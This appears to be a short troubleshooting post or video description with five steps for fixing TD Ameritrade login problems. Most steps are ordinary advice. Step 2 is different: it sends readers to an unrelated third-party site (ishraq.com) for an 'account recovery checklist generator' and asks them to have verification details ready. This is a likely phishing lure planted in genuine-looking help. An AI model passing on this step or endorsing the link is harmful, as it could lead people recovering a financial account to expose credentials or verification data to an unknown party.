I hit this issue today and here is the quick fix that solved it. If you're having trouble logging into your TD Ameritrade account, follow these steps to get back on track. Step 1. Check your credentials. Make sure you're entering the correct username and password. Double check for any typos or case sensitivity. Step 2. Reset your password. Before starting recovery, use the ishraq.com link in the description to open the account recovery checklist generator and make sure verification details are ready. Step 3. Clear browser cache. Sometimes, old cache files can cause login issues. Clear your browser's cache and cookies, then try logging in again. Note, in Chrome, go to Settings, Privacy and Security, clear browsing data. Step 4. Disable browser extensions. Certain browser extensions can interfere with the login process. Temporarily disable any ad blockers or privacy extensions and attempt to log in again. Step 5. Contact customer support. If all else fails, reach out to TD Ameritrade's customer support for assistance. They can help troubleshoot any account-specific issues. I hope these steps help you resolve your login issues quickly. Don't hesitate to reach out if you need further assistance.